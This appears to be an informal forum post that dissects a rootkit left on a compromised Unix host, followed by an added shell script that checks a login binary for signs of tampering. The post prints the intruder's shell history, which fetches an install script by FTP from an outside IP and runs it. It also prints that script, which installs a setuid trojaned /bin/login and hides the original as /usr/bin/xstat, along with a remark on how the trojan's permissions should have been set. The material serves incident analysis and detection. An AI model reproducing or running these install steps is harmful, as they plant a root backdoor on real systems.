.bash_history mean anything to you guys?
let's have a look:
bash# tail -35 /root/.bash_history | head -5
cd /dev/hda23
ftp 198.93.195.229
chmod +x install.sh
./install.sh
uname -a

nice guys.
let's look at install.sh.
bash# cat install.sh
#!/bin/sh
gcc -o login bj.c
chown root:bin login
chmod 4555 login
chmod u-w login
cp /bin/login /usr/bin/xstat
cp /bin/login /usr/bin/old
chmod 555 /usr/bin/xstat
chgrp bin /usr/bin/xstat
mv login /bin/login
rm bj.c

word. impressive. even wrong permissions on /bin/login.
should have been 4711. timestamping? *sigh*

last but not least, since they are using a kiddie trojan, let's have a look at it.

bash# strings /bin/login| tail -5
/usr/bin/xstat
TERM
vt400
vt100
%s=%s
bash#

vt400. nice fake TERM guys.

well I'm out. sleep well, and don't rm -rf. grep is your friend.
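
added example, not part of the original post: an sh triage routine for the tells noted above (the mode on /bin/login, its modification time, and embedded strings that name another binary or an unknown vt* terminal). the function names, both allowlists and the reference-file argument are assumptions made for illustration; stat -c is GNU syntax.

```shell
#!/bin/sh
# Added example: triage a login binary for the tells noted in the post.
# Both allowlists are assumptions for illustration; tune them per system.
KNOWN_TERMS="vt52 vt100 vt102 vt220 vt320 vt420"  # assumed real vt* names
KNOWN_PATHS="/bin/sh /bin/login"                   # assumed paths a stock login embeds

# Printable runs of 4+ characters, one per line (stand-in for strings(1)).
printable_runs() {
    LC_ALL=C tr -c '[:print:]' '\n' < "$1" | LC_ALL=C grep -E '.{4,}'
}

# triage_login FILE [EXPECTED_MODE] [REFERENCE_FILE]
# Prints one finding per line; prints nothing when all checks pass.
triage_login() {
    f=$1; want=${2:-4711}; ref=${3:-}
    mode=$(stat -c '%a' "$f") || return 2          # GNU stat syntax
    if [ "$mode" != "$want" ]; then
        echo "MODE $mode expected $want"
    fi
    # With timestamps left unreset, a replaced binary is newer than its neighbours.
    if [ -n "$ref" ] && [ -n "$(find "$f" -newer "$ref")" ]; then
        echo "MTIME $f newer than $ref"
    fi
    printable_runs "$f" | while IFS= read -r s; do
        case $s in
            /bin/*|/sbin/*|/usr/bin/*|/usr/sbin/*)
                case " $KNOWN_PATHS " in
                    *" $s "*) ;;
                    *) echo "PATHREF $s" ;;
                esac ;;
            vt[0-9]*)
                case " $KNOWN_TERMS " in
                    *" $s "*) ;;
                    *) echo "TERM $s" ;;
                esac ;;
        esac
    done
}

# Usage: triage_login /bin/login 4711 /bin/ls
```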